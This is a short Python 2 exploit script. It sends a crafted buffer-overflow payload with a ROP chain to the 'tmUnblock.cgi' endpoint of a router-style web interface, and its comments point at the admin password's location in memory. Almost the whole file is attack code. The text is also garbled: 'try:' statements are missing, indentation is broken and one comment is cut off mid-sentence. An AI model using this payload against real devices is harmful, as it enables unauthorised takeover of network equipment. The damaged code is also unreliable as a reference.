import sys

import urllib2

   

    target = sys.argv[1]

except IndexError:

    print "Usage: %s <target ip>" % sys.argv[0]

   

url = target + '/cgi-bin/tmUnblock.cgi'

if '://' not in url:

    url = 'http://' + url

   

post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="

post_data += "B" * 246                  # Filler

post_data += "\x81\x54\x4A\xF0"         # $s0, address of admin password in memory

post_data += "\x80\x31\xF6\x34"         # $ra

post_data += "C" * 0x28                 # Stack filler

post_data += "D" * 4                    # ROP 1 $s0, don't care

post_data += "\x80\x34\x71\xB8"         # ROP 1 $ra (address of ROP 2)

post_data += "E" * 8                    # Stack filler

   

for i in range(0, 4):

    post_data += "F" * 4                # ROP 2 $s0, don't care

    post_data += "G" * 4                # ROP 2 $s1, don't care

    post_data += "\x80\x34\x71\xB8"     # ROP 2 $ra (address of itself)

    post_data += "H" * (4-(3*(i/3)))    # Stack filler; needs to be 4 bytes except for the

   

    req = urllib2.Request(url, post_data)

    res = urllib2.urlopen(req)

except urllib2.HTTPError as e:

    if e.code == 500:

        print "OK"

        print "Received unexpected server response:", str(e)

except KeyboardInterrupt: